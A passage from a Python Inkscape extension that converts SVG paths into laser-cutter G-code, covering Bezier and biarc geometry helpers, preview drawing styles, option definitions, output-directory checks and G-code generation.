'url(#Arrow2Mend)'}),\n },\n \"biarc_style\": {\n 'biarc0': simplestyle.formatStyle(\n {'stroke': '#88f', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '1'}),\n 'biarc1': simplestyle.formatStyle(\n {'stroke': '#8f8', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '1'}),\n 'line': simplestyle.formatStyle(\n {'stroke': '#f88', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '1'}),\n 'area': simplestyle.formatStyle(\n {'stroke': '#777', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '0.1'}),\n },\n \"biarc_style_dark\": {\n 'biarc0': simplestyle.formatStyle(\n {'stroke': '#33a', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '1'}),\n 'biarc1': simplestyle.formatStyle(\n {'stroke': '#3a3', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '1'}),\n 'line': simplestyle.formatStyle(\n {'stroke': '#a33', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '1'}),\n 'area': simplestyle.formatStyle(\n {'stroke': '#222', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '0.3'}),\n },\n \"biarc_style_dark_area\": {\n 'biarc0': simplestyle.formatStyle(\n {'stroke': '#33a', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '0.1'}),\n 'biarc1': simplestyle.formatStyle(\n {'stroke': '#3a3', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '0.1'}),\n 'line': simplestyle.formatStyle(\n {'stroke': '#a33', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '0.1'}),\n 'area': simplestyle.formatStyle(\n {'stroke': '#222', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '0.3'}),\n },\n \"biarc_style_i\": {\n 'biarc0': simplestyle.formatStyle(\n {'stroke': '#880', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '1'}),\n 'biarc1': simplestyle.formatStyle(\n {'stroke': '#808', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '1'}),\n 'line': simplestyle.formatStyle(\n {'stroke': '#088', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '1'}),\n 'area': simplestyle.formatStyle(\n {'stroke': '#999', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '0.3'}),\n },\n \"biarc_style_dark_i\": {\n 'biarc0': simplestyle.formatStyle(\n {'stroke': '#dd5', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '1'}),\n 'biarc1': simplestyle.formatStyle(\n {'stroke': '#d5d', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '1'}),\n 'line': simplestyle.formatStyle(\n {'stroke': '#5dd', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '1'}),\n 'area': simplestyle.formatStyle(\n {'stroke': '#aaa', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '0.3'}),\n },\n \"biarc_style_lathe_feed\": {\n 'biarc0': simplestyle.formatStyle(\n {'stroke': '#07f', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '.4'}),\n 'biarc1': simplestyle.formatStyle(\n {'stroke': '#0f7', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '.4'}),\n 'line': simplestyle.formatStyle(\n {'stroke': '#f44', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '.4'}),\n 'area': simplestyle.formatStyle(\n {'stroke': '#aaa', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '0.3'}),\n },\n \"biarc_style_lathe_passing feed\": {\n 'biarc0': simplestyle.formatStyle(\n {'stroke': '#07f', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '.4'}),\n 'biarc1': simplestyle.formatStyle(\n {'stroke': '#0f7', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '.4'}),\n 'line': simplestyle.formatStyle(\n {'stroke': '#f44', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '.4'}),\n 'area': simplestyle.formatStyle(\n {'stroke': '#aaa', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '0.3'}),\n },\n \"biarc_style_lathe_fine feed\": {\n 'biarc0': simplestyle.formatStyle(\n {'stroke': '#7f0', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '.4'}),\n 'biarc1': simplestyle.formatStyle(\n {'stroke': '#f70', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '.4'}),\n 'line': simplestyle.formatStyle(\n {'stroke': '#744', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '.4'}),\n 'area': simplestyle.formatStyle(\n {'stroke': '#aaa', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '0.3'}),\n },\n \"area artefact\": simplestyle.formatStyle({'stroke': '#ff0000', 'fill': '#ffff00', 'stroke-width': '1'}),\n \"area artefact arrow\": simplestyle.formatStyle({'stroke': '#ff0000', 'fill': '#ffff00', 'stroke-width': '1'}),\n \"dxf_points\": simplestyle.formatStyle({\"stroke\": \"#ff0000\", \"fill\": \"#ff0000\"}),\n\n}\n\n\n################################################################################\n# Cubic Super Path additional functions\n################################################################################\n\ndef csp_segment_to_bez(sp1, sp2):\n return sp1[1:] + sp2[:2]\n\n\ndef csp_split(sp1, sp2, t=.5):\n [x1, y1], [x2, y2], [x3, y3], [x4, y4] = sp1[1], sp1[2], sp2[0], sp2[1]\n x12 = x1 + (x2 - x1) * t\n y12 = y1 + (y2 - y1) * t\n x23 = x2 + (x3 - x2) * t\n y23 = y2 + (y3 - y2) * t\n x34 = x3 + (x4 - x3) * t\n y34 = y3 + (y4 - y3) * t\n x1223 = x12 + (x23 - x12) * t\n y1223 = y12 + (y23 - y12) * t\n x2334 = x23 + (x34 - x23) * t\n y2334 = y23 + (y34 - y23) * t\n x = x1223 + (x2334 - x1223) * t\n y = y1223 + (y2334 - y1223) * t\n return [sp1[0], sp1[1], [x12, y12]], [[x1223, y1223], [x, y], [x2334, y2334]], [[x34, y34], sp2[1], sp2[2]]\n\n\ndef csp_curvature_at_t(sp1, sp2, t, depth=3):\n ax, ay, bx, by, cx, cy, dx, dy = bezmisc.bezierparameterize(csp_segment_to_bez(sp1, sp2))\n\n # curvature = (x'y''-y'x'') / (x'^2+y'^2)^1.5\n\n f1x = 3 * ax * t ** 2 + 2 * bx * t + cx\n f1y = 3 * ay * t ** 2 + 2 * by * t + cy\n f2x = 6 * ax * t + 2 * bx\n f2y = 6 * ay * t + 2 * by\n d = (f1x ** 2 + f1y ** 2) ** 1.5\n if d != 0:\n return (f1x * f2y - f1y * f2x) / d\n else:\n t1 = f1x * f2y - f1y * f2x\n if t1 > 0: return 1e100\n if t1 < 0: return -1e100\n # Use the Lapitals rule to solve 0/0 problem for 2 times...\n t1 = 2 * (bx * ay - ax * by) * t + (ay * cx - ax * cy)\n if t1 > 0: return 1e100\n if t1 < 0: return -1e100\n t1 = bx * ay - ax * by\n if t1 > 0: return 1e100\n if t1 < 0: return -1e100\n if depth > 0:\n # little hack ;^) hope it wont influence anything...\n return csp_curvature_at_t(sp1, sp2, t * 1.004, depth - 1)\n return 1e100\n\n\ndef csp_at_t(sp1, sp2, t):\n ax, bx, cx, dx = sp1[1][0], sp1[2][0], sp2[0][0], sp2[1][0]\n ay, by, cy, dy = sp1[1][1], sp1[2][1], sp2[0][1], sp2[1][1]\n\n x1, y1 = ax + (bx - ax) * t, ay + (by - ay) * t\n x2, y2 = bx + (cx - bx) * t, by + (cy - by) * t\n x3, y3 = cx + (dx - cx) * t, cy + (dy - cy) * t\n x4, y4 = x1 + (x2 - x1) * t, y1 + (y2 - y1) * t\n x5, y5 = x2 + (x3 - x2) * t, y2 + (y3 - y2) * t\n\n x, y = x4 + (x5 - x4) * t, y4 + (y5 - y4) * t\n return [x, y]\n\n\ndef cspseglength(sp1, sp2, tolerance=0.001):\n bez = (sp1[1][:], sp1[2][:], sp2[0][:], sp2[1][:])\n return bezmisc.bezierlength(bez, tolerance)\n\n\n# Distance calculation from point to arc\ndef point_to_arc_distance(p, arc):\n P0, P2, c, a = arc\n dist = None\n p = P(p)\n r = (P0 - c).mag()\n if r > 0:\n i = c + (p - c).unit() * r\n alpha = ((i - c).angle() - (P0 - c).angle())\n if a * alpha < 0:\n if alpha > 0:\n alpha = alpha - math.pi2\n else:\n alpha = math.pi2 + alpha\n if between(alpha, 0, a) or min(abs(alpha), abs(alpha - a)) < straight_tolerance:\n return (p - i).mag(), (i.x, i.y)\n else:\n d1, d2 = (p - P0).mag(), (p - P2).mag()\n if d1 < d2:\n return (d1, (P0.x, P0.y))\n else:\n return (d2, (P2.x, P2.y))\n\n\ndef csp_to_arc_distance(sp1, sp2, arc1, arc2, tolerance=0.01): # arc = [start,end,center,alpha]\n n, i = 10, 0\n d, d1, dl = (0, (0, 0)), (0, (0, 0)), 0\n while i < 1 or (abs(d1[0] - dl[0]) > tolerance and i < 4):\n i += 1\n dl = d1 * 1\n for j in range(n + 1):\n t = float(j) / n\n p = csp_at_t(sp1, sp2, t)\n d = min(point_to_arc_distance(p, arc1), point_to_arc_distance(p, arc2))\n # inkex.debug(\"---Debug---\")\n # inkex.debug(str(d1) + str(d))\n # inkex.debug(str(tuple(d1)) + str(tuple(d)))\n d1 = max(tuple(d1), tuple(d))\n n = n * 2\n return d1[0]\n\n\n################################################################################\n# Common functions\n################################################################################\n\ndef atan2(*arg):\n if len(arg) == 1 and (type(arg[0]) == type([0., 0.]) or type(arg[0]) == type((0., 0.))):\n return (math.pi / 2 - math.atan2(arg[0][0], arg[0][1])) % math.pi2\n elif len(arg) == 2:\n\n return (math.pi / 2 - math.atan2(arg[0], arg[1])) % math.pi2\n else:\n raise ValueError(\"Bad argumets for atan! (%s)\" % arg)\n\n\ndef between(c, x, y):\n return x - straight_tolerance <= c <= y + straight_tolerance or y - straight_tolerance <= c <= x + straight_tolerance\n\n\n# Print arguments into specified log file\ndef print_(*arg):\n f = open(options.log_filename, \"a\")\n for s in arg:\n s = str(str(s).encode('unicode_escape')) + \" \"\n f.write(s)\n f.write(\"\\n\")\n f.close()\n\n\n################################################################################\n# Point (x,y) operations\n################################################################################\n\nclass P:\n def __init__(self, x, y=None):\n if not y == None:\n self.x, self.y = float(x), float(y)\n else:\n self.x, self.y = float(x[0]), float(x[1])\n\n def __add__(self, other):\n return P(self.x + other.x, self.y + other.y)\n\n def __sub__(self, other):\n return P(self.x - other.x, self.y - other.y)\n\n def __neg__(self):\n return P(-self.x, -self.y)\n\n def __mul__(self, other):\n if isinstance(other, P):\n return self.x * other.x + self.y * other.y\n return P(self.x * other, self.y * other)\n\n __rmul__ = __mul__\n\n def __div__(self, other):\n return P(self.x / other, self.y / other)\n\n # Added to support python 3\n __floordiv__ = __div__\n __truediv__ = __div__\n\n def mag(self):\n return math.hypot(self.x, self.y)\n\n def unit(self):\n h = self.mag()\n if h:\n return self / h\n else:\n return P(0, 0)\n\n def angle(self):\n return math.atan2(self.y, self.x)\n\n def __repr__(self):\n return '%f,%f' % (self.x, self.y)\n\n def l2(self):\n return self.x * self.x + self.y * self.y\n\n\n################################################################################\n#\n# Biarc function\n#\n# Calculates biarc approximation of cubic super path segment\n# splits segment if needed or approximates it with straight line\n#\n################################################################################\ndef biarc(sp1, sp2, z1, z2, depth=0):\n def biarc_split(sp1, sp2, z1, z2, depth):\n if depth < options.biarc_max_split_depth:\n sp1, sp2, sp3 = csp_split(sp1, sp2)\n l1, l2 = cspseglength(sp1, sp2), cspseglength(sp2, sp3)\n if l1 + l2 == 0:\n zm = z1\n else:\n zm = z1 + (z2 - z1) * l1 / (l1 + l2)\n return biarc(sp1, sp2, z1, zm, depth + 1) + biarc(sp2, sp3, zm, z2, depth + 1)\n else:\n return [[sp1[1], 'line', 0, 0, sp2[1], [z1, z2]]]\n\n P0, P4 = P(sp1[1]), P(sp2[1])\n TS, TE, v = (P(sp1[2]) - P0), -(P(sp2[0]) - P4), P0 - P4\n tsa, tea, va = TS.angle(), TE.angle(), v.angle()\n if TE.mag() < straight_distance_tolerance and TS.mag() < straight_distance_tolerance:\n # Both tangents are zerro - line straight\n return [[sp1[1], 'line', 0, 0, sp2[1], [z1, z2]]]\n if TE.mag() < straight_distance_tolerance:\n TE = -(TS + v).unit()\n r = TS.mag() / v.mag() * 2\n elif TS.mag() < straight_distance_tolerance:\n TS = -(TE + v).unit()\n r = 1 / (TE.mag() / v.mag() * 2)\n else:\n r = TS.mag() / TE.mag()\n TS, TE = TS.unit(), TE.unit()\n tang_are_parallel = (\n (tsa - tea) % math.pi < straight_tolerance or math.pi - (tsa - tea) % math.pi < straight_tolerance)\n if (tang_are_parallel and\n ((\n v.mag() < straight_distance_tolerance or TE.mag() < straight_distance_tolerance or TS.mag() < straight_distance_tolerance) or\n 1 - abs(TS * v / (TS.mag() * v.mag())) < straight_tolerance)):\n # Both tangents are parallel and start and end are the same - line straight\n # or one of tangents still smaller then tollerance\n\n # Both tangents and v are parallel - line straight\n return [[sp1[1], 'line', 0, 0, sp2[1], [z1, z2]]]\n\n c, b, a = v * v, 2 * v * (r * TS + TE), 2 * r * (TS * TE - 1)\n if v.mag() == 0:\n return biarc_split(sp1, sp2, z1, z2, depth)\n asmall, bsmall, csmall = abs(a) < 10 ** -10, abs(b) < 10 ** -10, abs(c) < 10 ** -10\n if asmall and b != 0:\n beta = -c / b\n elif csmall and a != 0:\n beta = -b / a\n elif not asmall:\n discr = b * b - 4 * a * c\n if discr < 0: raise ValueError(a, b, c, discr)\n disq = discr ** .5\n beta1 = (-b - disq) / 2 / a\n beta2 = (-b + disq) / 2 / a\n if beta1 * beta2 > 0: raise ValueError(a, b, c, disq, beta1, beta2)\n beta = max(beta1, beta2)\n elif asmall and bsmall:\n return biarc_split(sp1, sp2, z1, z2, depth)\n alpha = beta * r\n ab = alpha + beta\n P1 = P0 + alpha * TS\n P3 = P4 - beta * TE\n P2 = (beta / ab) * P1 + (alpha / ab) * P3\n\n\n def calculate_arc_params(P0, P1, P2):\n D = (P0 + P2) / 2\n if (D - P1).mag() == 0: return None, None\n R = D - ((D - P0).mag() ** 2 / (D - P1).mag()) * (P1 - D).unit()\n p0a, p1a, p2a = (P0 - R).angle() % (2 * math.pi), (P1 - R).angle() % (2 * math.pi), (P2 - R).angle() % (\n 2 * math.pi)\n alpha = (p2a - p0a) % (2 * math.pi)\n if (p0a < p2a and (p1a < p0a or p2a < p1a)) or (p2a < p1a < p0a):\n alpha = -2 * math.pi + alpha\n if abs(R.x) > 1000000 or abs(R.y) > 1000000 or (R - P0).mag() < .1:\n return None, None\n else:\n return R, alpha\n\n R1, a1 = calculate_arc_params(P0, P1, P2)\n R2, a2 = calculate_arc_params(P2, P3, P4)\n if R1 == None or R2 == None or (R1 - P0).mag() < straight_tolerance or (\n R2 - P2).mag() < straight_tolerance: return [[sp1[1], 'line', 0, 0, sp2[1], [z1, z2]]]\n\n d = csp_to_arc_distance(sp1, sp2, [P0, P2, R1, a1], [P2, P4, R2, a2])\n if d > 1 and depth < options.biarc_max_split_depth:\n return biarc_split(sp1, sp2, z1, z2, depth)\n else:\n if R2.mag() * a2 == 0:\n zm = z2\n else:\n zm = z1 + (z2 - z1) * (abs(R1.mag() * a1)) / (abs(R2.mag() * a2) + abs(R1.mag() * a1))\n return [[sp1[1], 'arc', [R1.x, R1.y], a1, [P2.x, P2.y], [z1, zm]],\n [[P2.x, P2.y], 'arc', [R2.x, R2.y], a2, [P4.x, P4.y], [zm, z2]]]\n\n\n################################################################################\n# Polygon class\n################################################################################\nclass Polygon:\n def __init__(self, polygon=None):\n self.polygon = [] if polygon == None else polygon[:]\n\n def add(self, add):\n if type(add) == type([]):\n self.polygon += add[:]\n else:\n self.polygon += add.polygon[:]\n\n\nclass ArrangementGenetic:\n # gene = [fittness, order, rotation, xposition]\n # spieces = [gene]*shapes count\n # population = [spieces]\n def __init__(self, polygons, material_width):\n self.population = []\n self.genes_count = len(polygons)\n self.polygons = polygons\n self.width = material_width\n self.mutation_factor = 0.1\n self.order_mutate_factor = 1.\n self.move_mutate_factor = 1.\n\n\n################################################################################\n###\n### Gcodetools class\n###\n################################################################################\n\nclass LaserGcode(inkex.Effect):\n\n def export_gcode(self, gcode):\n gcode_pass = gcode\n for x in range(1, self.options.passes):\n gcode += \"G91\\nG1 Z-\" + self.options.pass_depth + \"\\nG90\\n\" + gcode_pass\n f = open(self.options.directory + self.options.file, \"w\")\n f.write(\n self.options.laser_off_command + \" S0\" + \"\\n\" + self.header +\n \"G1 F\" + self.options.travel_speed + \"\\n\" + gcode + self.footer)\n f.close()\n\n def add_arguments_old(self):\n add_option = self.OptionParser.add_option\n\n for arg in self.arguments:\n # Stringify add_option arguments\n action = arg[\"action\"] if \"action\" in arg else \"store\"\n arg_type = {str: \"str\", int: \"int\", bool: \"inkbool\"}[arg[\"type\"]]\n default = arg[\"type\"](arg[\"default\"])\n\n add_option(\"\", arg[\"name\"], action=action, type=arg_type, dest=arg[\"dest\"],\n default=default, help=arg[\"help\"])\n\n def add_arguments_new(self):\n add_argument = self.arg_parser.add_argument\n\n for arg in self.arguments:\n # Not using kwargs unpacking for clarity, flexibility and constancy with add_arguments_old\n action = arg[\"action\"] if \"action\" in arg else \"store\"\n add_argument(arg[\"name\"], action=action, type=arg[\"type\"], dest=arg[\"dest\"],\n default=arg[\"default\"], help=arg[\"help\"])\n\n def __init__(self):\n inkex.Effect.__init__(self)\n\n # Define command line arguments, inkex will use these to interface with the GUI defined in laser.ini\n\n self.arguments = [\n {\"name\": \"--directory\", \"type\": str, \"dest\": \"directory\",\n \"default\": \"\", \"help\": \"Output directory\"},\n\n {\"name\": \"--filename\", \"type\": str, \"dest\": \"file\",\n \"default\": \"Dessin.gcode\", \"help\": \"File name\"},\n\n {\"name\": \"--add-numeric-suffix-to-filename\", \"type\": inkex.Boolean,\n \"dest\": \"add_numeric_suffix_to_filename\", \"default\": False,\n \"help\": \"Add numeric suffix to file name\"},\n\n {\"name\": \"--laser-command\", \"type\": str, \"dest\": \"laser_command\",\n \"default\": \"G1 Z0 F15\", \"help\": \"Laser gcode command\"},\n\n {\"name\": \"--laser-off-command\", \"type\": str, \"dest\": \"laser_off_command\",\n \"default\": \"G1 Z1 F15\", \"help\": \"Laser gcode end command\"},\n\n {\"name\": \"--laser-speed\", \"type\": int, \"dest\": \"laser_speed\", \"default\": 3000,\n \"default\": \"3000\",\"help\": \"Laser speed (mm/min},\"},\n\n {\"name\": \"--travel-speed\", \"type\": str, \"dest\": \"travel_speed\",\n \"default\": \"3000\", \"help\": \"Travel speed (mm/min},\"},\n\n {\"name\": \"--laser-power\", \"type\": int, \"dest\": \"laser_power\", \"default\": 255,\n \"help\": \"S# is 256 or 10000 for full power\"},\n\n {\"name\": \"--passes\", \"type\": int, \"dest\": \"passes\", \"default\": 1,\n \"help\": \"Quantity of passes\"},\n\n {\"name\": \"--pass-depth\", \"type\": str, \"dest\": \"pass_depth\", \"default\": 1,\n \"help\": \"Depth of laser cut\"},\n\n {\"name\": \"--power-delay\", \"type\": str, \"dest\": \"power_delay\",\n \"default\": \"0\", \"help\": \"Laser power-on delay (ms},\"},\n\n {\"name\": \"--suppress-all-messages\", \"type\": inkex.Boolean,\n \"dest\": \"suppress_all_messages\", \"default\": True,\n \"help\": \"Hide messages during g-code generation\"},\n\n {\"name\": \"--create-log\", \"type\": bool, \"dest\": \"log_create_log\",\n \"default\": False, \"help\": \"Create log files\"},\n\n {\"name\": \"--log-filename\", \"type\": str, \"dest\": \"log_filename\",\n \"default\": '', \"help\": \"Create log files\"},\n\n {\"name\": \"--engraving-draw-calculation-paths\", \"type\": inkex.Boolean,\n \"dest\": \"engraving_draw_calculation_paths\", \"default\": False,\n \"help\": \"Draw additional graphics to debug engraving path\"},\n\n {\"name\": \"--unit\", \"type\": str, \"dest\": \"unit\",\n \"default\": \"G21 (All units in mm},\", \"help\": \"Units either mm or inches\"},\n\n {\"name\": \"--active-tab\", \"type\": str, \"dest\": \"active_tab\", \"default\": \"\",\n \"help\": \"Defines which tab is active\"},\n\n {\"name\": \"--biarc-max-split-depth\", \"type\": int,\n \"dest\": \"biarc_max_split_depth\", \"default\": \"4\",\n \"help\": \"Defines maximum depth of splitting while approximating using biarcs.\"}\n ]\n\n if target_version < 1.0:\n self.add_arguments_old()\n else:\n self.add_arguments_new()\n\n # Another hack to maintain support across different Inkscape versions\n if target_version < 1.0:\n self.selected_hack = self.selected\n else:\n self.selected_hack = self.svg.selected\n\n def parse_curve(self, p, layer, w=None, f=None):\n c = []\n if len(p) == 0:\n return []\n p = self.transform_csp(p, layer)\n\n # Sort to reduce Rapid distance\n k = list(range(1, len(p)))\n keys = [0]\n while len(k) > 0:\n end = p[keys[-1]][-1][1]\n dist = (float('-inf'), float('-inf'))\n for i in range(len(k)):\n start = p[k[i]][0][1]\n dist = max((-((end[0] - start[0]) ** 2 + (end[1] - start[1]) ** 2), i), dist)\n\n keys += [k[dist[1]]]\n del k[dist[1]]\n for k in keys:\n subpath = p[k]\n c += [[[subpath[0][1][0], subpath[0][1][1]], 'move', 0, 0]]\n for i in range(1, len(subpath)):\n sp1 = [[subpath[i - 1][j][0], subpath[i - 1][j][1]] for j in range(3)]\n sp2 = [[subpath[i][j][0], subpath[i][j][1]] for j in range(3)]\n c += biarc(sp1, sp2, 0, 0) if w == None else biarc(sp1, sp2, -f(w[k][i - 1]), -f(w[k][i]))\n # l1 = biarc(sp1,sp2,0,0) if w==None else biarc(sp1,sp2,-f(w[k][i-1]),-f(w[k][i]))\n # print_((-f(w[k][i-1]),-f(w[k][i]), [i1[5] for i1 in l1]) )\n c += [[[subpath[-1][1][0], subpath[-1][1][1]], 'end', 0, 0]]\n print_(\"Curve: \" + str(c))\n return c\n\n def draw_curve(self, curve, layer, group=None, style=styles[\"biarc_style\"]):\n\n self.get_defs()\n # Add marker to defs if it does not exist\n if \"DrawCurveMarker\" not in self.defs:\n defs = etree.SubElement(self.document.getroot(), inkex.addNS(\"defs\", \"svg\"))\n marker = etree.SubElement(defs, inkex.addNS(\"marker\", \"svg\"),\n {\"id\": \"DrawCurveMarker\", \"orient\": \"auto\", \"refX\": \"-8\",\n \"refY\": \"-2.41063\", \"style\": \"overflow:visible\"})\n etree.SubElement(marker, inkex.addNS(\"path\", \"svg\"),\n {\n \"d\": \"m -6.55552,-2.41063 0,0 L -13.11104,0 c 1.0473,-1.42323 1.04126,-3.37047 0,-4.82126\",\n \"style\": \"fill:#000044; fill-rule:evenodd;stroke-width:0.62500000;stroke-linejoin:round;\"}\n )\n if \"DrawCurveMarker_r\" not in self.defs:\n defs = etree.SubElement(self.document.getroot(), inkex.addNS(\"defs\", \"svg\"))\n marker = etree.SubElement(defs, inkex.addNS(\"marker\", \"svg\"),\n {\"id\": \"DrawCurveMarker_r\", \"orient\": \"auto\", \"refX\": \"8\",\n \"refY\": \"-2.41063\", \"style\": \"overflow:visible\"})\n etree.SubElement(marker, inkex.addNS(\"path\", \"svg\"),\n {\n \"d\": \"m 6.55552,-2.41063 0,0 L 13.11104,0 c -1.0473,-1.42323 -1.04126,-3.37047 0,-4.82126\",\n \"style\": \"fill:#000044; fill-rule:evenodd;stroke-width:0.62500000;stroke-linejoin:round;\"}\n )\n for i in [0, 1]:\n style['biarc%s_r' % i] = simplestyle.parseStyle(style['biarc%s' % i])\n style['biarc%s_r' % i][\"marker-start\"] = \"url(#DrawCurveMarker_r)\"\n del (style['biarc%s_r' % i][\"marker-end\"])\n style['biarc%s_r' % i] = simplestyle.formatStyle(style['biarc%s_r' % i])\n\n if group is None:\n group = etree.SubElement(self.layers[min(1, len(self.layers) - 1)], inkex.addNS('g', 'svg'),\n {\"gcodetools\": \"Preview group\"})\n s, arcn = '', 0\n\n a, b, c = [0., 0.], [1., 0.], [0., 1.]\n k = (b[0] - a[0]) * (c[1] - a[1]) - (c[0] - a[0]) * (b[1] - a[1])\n a, b, c = self.transform(a, layer, True), self.transform(b, layer, True), self.transform(c, layer, True)\n if ((b[0] - a[0]) * (c[1] - a[1]) - (c[0] - a[0]) * (b[1] - a[1])) * k > 0:\n reverse_angle = 1\n else:\n reverse_angle = -1\n for sk in curve:\n si = sk[:]\n si[0], si[2] = self.transform(si[0], layer, True), (\n self.transform(si[2], layer, True) if type(si[2]) == type([]) and len(si[2]) == 2 else si[2])\n\n if s != '':\n if s[1] == 'line':\n etree.SubElement(group, inkex.addNS('path', 'svg'),\n {\n 'style': style['line'],\n 'd': 'M %s,%s L %s,%s' % (s[0][0], s[0][1], si[0][0], si[0][1]),\n \"gcodetools\": \"Preview\",\n }\n )\n elif s[1] == 'arc':\n arcn += 1\n sp = s[0]\n c = s[2]\n s[3] = s[3] * reverse_angle\n\n a = ((P(si[0]) - P(c)).angle() - (P(s[0]) - P(c)).angle()) % math.pi2 # s[3]\n if s[3] * a < 0:\n if a > 0:\n a = a - math.pi2\n else:\n a = math.pi2 + a\n r = math.sqrt((sp[0] - c[0]) ** 2 + (sp[1] - c[1]) ** 2)\n a_st = (math.atan2(sp[0] - c[0], - (sp[1] - c[1])) - math.pi / 2) % (math.pi * 2)\n st = style['biarc%s' % (arcn % 2)][:]\n if a > 0:\n a_end = a_st + a\n st = style['biarc%s' % (arcn % 2)]\n else:\n a_end = a_st * 1\n a_st = a_st + a\n st = style['biarc%s_r' % (arcn % 2)]\n etree.SubElement(group, inkex.addNS('path', 'svg'),\n {\n 'style': st,\n inkex.addNS('cx', 'sodipodi'): str(c[0]),\n inkex.addNS('cy', 'sodipodi'): str(c[1]),\n inkex.addNS('rx', 'sodipodi'): str(r),\n inkex.addNS('ry', 'sodipodi'): str(r),\n inkex.addNS('start', 'sodipodi'): str(a_st),\n inkex.addNS('end', 'sodipodi'): str(a_end),\n inkex.addNS('open', 'sodipodi'): 'true',\n inkex.addNS('type', 'sodipodi'): 'arc',\n \"gcodetools\": \"Preview\",\n })\n s = si\n\n\n def check_dir(self):\n if self.options.directory[-1] not in [\"/\", \"\\\\\"]:\n if \"\\\\\" in self.options.directory:\n self.options.directory += \"\\\\\"\n else:\n self.options.directory += \"/\"\n print_(\"Checking direcrory: '%s'\" % self.options.directory)\n if (os.path.isdir(self.options.directory)):\n if (os.path.isfile(self.options.directory + 'header')):\n f = open(self.options.directory + 'header', 'r')\n self.header = f.read()\n f.close()\n else:\n self.header = defaults['header']\n if (os.path.isfile(self.options.directory + 'footer')):\n f = open(self.options.directory + 'footer', 'r')\n self.footer = f.read()\n f.close()\n else:\n self.footer = defaults['footer']\n\n if self.options.unit == \"G21 (All units in mm)\":\n self.header += \"G21\\n\"\n elif self.options.unit == \"G20 (All units in inches)\":\n self.header += \"G20\\n\"\n else:\n self.error(_(\"Directory does not exist! Please specify existing directory at options tab!\"), \"error\")\n return False\n\n if self.options.add_numeric_suffix_to_filename:\n dir_list = os.listdir(self.options.directory)\n if \".\" in self.options.file:\n r = re.match(r\"^(.*)(\\..*)$\", self.options.file)\n ext = r.group(2)\n name = r.group(1)\n else:\n ext = \"\"\n name = self.options.file\n max_n = 0\n for s in dir_list:\n r = re.match(r\"^%s_0*(\\d+)%s$\" % (re.escape(name), re.escape(ext)), s)\n if r:\n max_n = max(max_n, int(r.group(1)))\n filename = name + \"_\" + (\"0\" * (4 - len(str(max_n + 1))) + str(max_n + 1)) + ext\n self.options.file = filename\n\n print_(\"Testing writing rights on '%s'\" % (self.options.directory + self.options.file))\n try:\n f = open(self.options.directory + self.options.file, \"w\")\n f.close()\n except:\n self.error(_(\"Can not write to specified file!\\n%s\" % (self.options.directory + self.options.file)),\n \"error\")\n return False\n return True\n\n\n ################################################################################\n #\n # Generate Gcode\n #\n # Curve definition\n # [start point, type = {'arc','line','move','end'}, arc center, arc angle, end point, [zstart, zend]]\n #\n ################################################################################\n\n def generate_gcode(self, curve, layer, depth):\n tool = self.tools\n print_(\"Tool in g-code generator: \" + str(tool))\n\n def c(c):\n c = [c[i] if i < len(c) else None for i in range(6)]\n if c[5] == 0: c[5] = None\n s = [\" X\", \" Y\", \" Z\", \" I\", \" J\", \" K\"]\n r = ''\n for i in range(6):\n if c[i] != None:\n r += s[i] + (\"%f\" % (round(c[i], 4))).rstrip('0')\n return r\n\n\n if len(curve) == 0: return \"\"\n\n try:\n self.last_used_tool == None\n except:\n self.last_used_tool = None\n print_(\"working on curve\")\n print_(\"Curve: \" + str(curve))\n g = \"\"\n\n lg, f = 'G00', \"F%f\" % tool['penetration feed']\n penetration_feed = \"F%s\" % tool['penetration feed']\n current_a = 0\n for i in range(1, len(curve)):\n # Creating Gcode for curve between s=curve[i-1] and si=curve[i] start at s[0] end at s[4]=si[0]\n s, si = curve[i - 1], curve[i]\n feed = f if lg not in ['G01', 'G02', 'G03'] else ''\n if s[1] == 'move':\n g += \"G1 \" + c(si[0]) + \"\\n\" + tool['gcode before path'] + \"\\n\"\n lg = 'G00'\n elif s[1] == 'end':\n g += tool['gcode after path'] + \"\\n\"\n lg = 'G00'\n elif s[1] == 'line':\n if lg == 